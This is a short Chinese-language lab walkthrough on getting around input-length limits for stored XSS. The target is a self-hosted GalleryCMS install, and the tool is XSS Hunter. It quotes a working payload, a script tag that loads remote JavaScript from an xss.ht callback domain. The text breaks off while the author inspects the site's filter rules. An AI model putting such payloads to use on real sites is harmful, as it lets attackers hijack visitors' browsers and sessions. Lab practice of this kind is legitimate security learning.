XSS短字符域名绕过
先在phpstudy上搭建一个gamerycms的一个平台,文件可以在github上获得:https://github.com/bensonarts/GalleryCMS
搭建完成之后我们就有以下的界面
这将是我们进行xss存储型攻击的目标,当然也需要一个工具这边国内外都有网站,我用的国外的网站,https://xsshunter.com/直接注册,为了之后的方便建议把自定义xss域名设置短一点,然后我们就可以进行尝试绕过了;
先一步把靶机配置好环境,然后我们进到xsshunter中在里边我们能获取到Payloads,这是推荐给我们的语句,是可以直接使用的。
通常情况下,程序员在编写前端的时候,都会限制我们用户输入的字符长度,所以我们要选择最短的一条语句输入;
这条是最短的(别问我为什么域名这么长,申请不到)
<script>$.getScript("//1122334zmbgxyh233.xss.ht")</script>
之后就前往搭建好的网站上测试
在里边输入我们复制的最短的语句并Add;
很明显说输入的长度不能超过45字节,我们输入的超过了45字节,那我们就应该怎么样去减少长度,这时候我们想方设法(上帝模式)去查看网站对输入的标签的过滤规则